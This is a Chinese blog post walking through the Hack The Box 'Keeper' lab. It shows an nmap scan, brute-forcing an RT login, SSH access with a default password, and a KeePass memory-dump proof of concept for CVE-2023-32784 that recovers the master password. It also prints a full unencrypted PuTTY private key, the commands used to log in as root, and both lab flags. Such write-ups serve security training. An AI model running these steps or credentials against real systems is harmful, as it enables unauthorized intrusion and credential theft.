HTB Keeper CVE-2023-32784

最新推荐文章于 2024-11-13 13:55:03 发布
最新推荐文章于 2024-11-13 13:55:03 发布
阅读量494 收藏 6
点赞数 9
分类专栏: HTB 文章标签: 安全 web安全 网络安全 系统安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49288916/article/details/135481845
版权

HTB Keeper

使用nmap进行端口扫描

nmap -sV -sC -v -oN keeper 10.10.11.227

# Nmap 7.93 scan initiated Mon Jan  8 19:01:59 2024 as: nmap -sV -sC -v -oN keeper 10.10.11.227
Nmap scan report for 10.10.11.227
Host is up (1.4s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_  256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan  8 19:02:40 2024 -- 1 IP address (1 host up) scanned in 40.50 seconds

把域名及子域名添加到hosts,发现一个登录框,以及是RT 4.4.4版本

在这里插入图片描述

搜索RT4.4.4没啥重要漏洞能利用,尝试爆破登录框

在这里插入图片描述

在这里插入图片描述

爆破出来用户为root 密码为password

登录进去发现一个lnorgaard用户在他的备注中说的,初始密码设置为Welcome2023!

使用ssh登录到目标机

在这里插入图片描述

查看到用户flag

在这里插入图片描述

f4ed517f811635fb6ca7259a51cebe5e

使用sudo -l查看使用有sudo权限,并没有

在这里插入图片描述

上传linpeas,进行信息收集

在这里插入图片描述

在用户目录发现一个RT30000.zip压缩包

在这里插入图片描述

开启http传输到本地

在这里插入图片描述

解压后发现是一个dmp文件,dmp文件是系统错误产生的文件

G搜索dmp exploit, 发现有CVE-2023-32784漏洞

在这里插入图片描述

keepass-转储-主密钥

git clone https://github.com/matro7sh/keepass-dump-masterkey.git
python poc.py KeePassDumpFull.dmp

带●的是遗失的,第二个字符是猜测的,有些wp不懂就去看资料,说●像o,又懂完了,别误人子弟。

在这里插入图片描述

使用G搜索,密码为:rødgrød med fløde

在这里插入图片描述

下载密码管理器keepassxc打开passcodes

apt install keepassxc
keepassxc passcodes.kdbx

在这里插入图片描述

将备注复制到123.txt

PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

下载putty工具,并将其转成openssh格式的id_rsa文件

apt install putty-tools
puttygen 123.txt -O private-openssh -o id_rsa

赋予id_rsa文件600权限,并用ssh 密钥文件连接

chmod 600 id_rsa
ssh root@10.10.11.227 -i id_rsa

在这里插入图片描述

13b55d7528b666b3dc00ce2caf264ffe
强少张
关注
专栏目录
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
HTB setup script-开源
05-02
HTB.init是从CBQ.init派生的Shell脚本,它允许在Linux上轻松设置基于HTB的流量控制。 HTB(分层令牌桶)是一种新的排队规则,它试图解决当前CBQ实施中的弱点。
KeePass CVE-2023-32784:进程内存转储检测
数据安全学习分享
08-12 633
CVE-2023-32784允许从内存转储中恢复明文主密码。内存转储可以是KeePass进程转储、交换文件(pagefile.sys)、休眠文件(hiberfil.sys)或整个系统的RAM转储KeePass 2.X使用自定义开发的密码输入文本框SecureTextBoxEx。在这个CVE中被利用的漏洞是,每输入一个字符,就会在内存中创建一个剩余字符串。由于.NET的工作原理,一旦它被创建出来几乎不可能摆脱它。
putty密钥认证
杨奇的博客
09-24 413
创建一个放置私钥的文件 [root@localhost ~]#mkdir /root/.ssh //创建一个目录 [root@localhost ~]#chmod 700 /root/.ssh //设置权限 [root@localhost ~]#vi /root/.ssh/authorized_keys //vi编辑配置文件 电脑端打开生成密钥的软件 开始生成密钥对 ...
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 6912
网络安全-CVE - CIS 漏洞分析以及解决
HTB Hospital——CVE-2023-35001,CVE-2023-2640-CVE-2023-32629,CVE-2023-36664
q
12-17 508
查看htdocs权限,发现有system权限,文件夹是system权限的,那么webshell拿到的也应该是system的,上传个web后门进行提权。————本文章仅用于学习记录,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。在c盘看见一个xammp的文件----XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。登录到8080WEB端口,注册一个用户进入发现一个文件上传点。
HTB | Surveillance CVE-2023-41892 CVE-2023-26035
q
12-24 1066
BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。在/var/www/html/craft/storage/backups中发现一个sql的压缩包,使用python开启http服务,访问并下载文件。使用hash-identifier识别hash属性,识别出来为SHA-256,Haval-256。使用sudo执行shell脚本 pass中的密码是上文linpeas找到的。1888吉利数保存一下。
HTB-Netmon-Win-CVE-2018-9276
yutianovo的博客
02-19 475
靶机描述 清单 信息搜集 nmap 匿名ftp 获取 .bak (泄露密码) 提权 CVE-2018-9276 信息搜集 靶机IP 端口扫描 nmap 10.10.10.152 -A Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP cod
HTB-areo
2201_75378806的博客
06-01 778
端口扫描根据 IIS 版本,主机可能运行现代 Windows 操作系统(Window 10/11 或 Server 2016+)。访问80底下有一个上传自定义主题的表单尝试上传图片会失败,他需要.theme和.themepack扩展名制作一个虚拟文件test.theme并上传它该网站还表示将测试该主题,这意味着有人会打开它底部有一封电子邮件。页面上的所有链接都指向同一页面的其他部分。没有什么有用的进行目录爆破。
HTB-Devvortex-CVE-2023-1326
q
12-17 214
Devvortex使用nmap扫描服务器使用wfuzz进行子域名爆破爆破出dev的子域名,将子域名加入hosts使用gobuster对dev.devvortex.htb进行目录扫描扫描出administrator的目录发现登录页面扫描出README.txt,发现joomla版本为4.2发现是joomla cms在网上发现有专门的漏洞扫描工具:joomscan下载使用joomscan进行扫描扫描出joomla的版本为4.2.6 并且扫描出部分目录。
htb-Mailing
whale_waves的博客
05-23 1489
Microsoft Office Outlook是微软office的组件之一,也是常用的邮件客户端之一。CVE-2024-21413 是在 Microsoft Outlook 中发现的一个重大安全漏洞,CVSS 评分 9.8。攻击者将一个带恶意链接的邮件发送给被攻击用户,当用户点击链接时,会导致NTLM窃取与远程代码执行(RCE),并且该漏洞还能使攻击者能够绕过Office文档的受保护视图。本文先讲复现过程,后讲漏洞原理。
CVE-2023-4016
08-17
很抱歉,我没有找到与您提到的CVE-2023-4016相关的引用资料。是否有其他问题我可以帮助您解答?<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* [HTB...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 1541
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
weixin_46641057的博客
11-09 1031
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领域知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
漏洞复现」某赛通电子文档安全管理系统 HookService SQL注入漏洞复现(CVE-2024-10660)
最新发布
qq_39894062的博客
11-13 385
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
电子电气架构--- 实施基于以太网的安全车载网络
Soly_kun的博客
11-10 713
电子电气架构--- 实施基于以太网的安全车载网络
【 AI写作鹅-注册安全分析报告-无验证方式导致安全隐患】
11-08 1186
合肥名阳信息技术有限公司成立于2016年,是一家专门从事移动互联网应用研发和运营的国家高新技术企业。公司坚持以用户为中心,打造富有吸引力的产品,满足移动互联网用户各项需求。公司产品涵盖:AI配音、AI写作、AiPPT、同声传译、文生视频,AI绘画、各种工具类应用,为消费者提供完善的办公、多媒体等领域的解决方案,秉承着专业、服务、高效、客户至上的原则,多年来致力于为用户提供服务新体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值